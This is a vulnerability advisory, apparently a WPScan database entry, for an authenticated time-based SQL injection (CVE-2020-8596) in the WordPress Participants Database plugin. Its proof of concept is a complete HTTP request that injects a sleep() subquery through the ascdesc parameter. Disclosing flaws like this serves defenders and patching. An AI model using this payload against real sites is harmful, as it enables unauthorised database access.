Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection



Description
Authenticated time-based SQL injection via the ascdesc, list_filter_count, and sortBy parameters.
Proof of Concept
Form the original advisory (see references):

POST /wp-admin/admin.php?page=participants-database HTTP/1.1
Host: *redacted....cause*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /wp-admin/admin.php?page=participants-database
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
Connection: close
Cookie: *cookies were here*

Upgrade-Insecure-Requests: 1

action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort

Affects Plugin

fixed in version 1.9.5.6

References

CVE 2020-8596
URL https://blog.impenetrable.tech/cve-2020-8596

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Teacish
Views 2868
Verified No
WPVDB ID 10068

Timeline

Publicly Published 2020-02-10 (11 days ago)
Added 2020-02-11 (9 days ago)
Last Updated 2020-02-12 (8 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin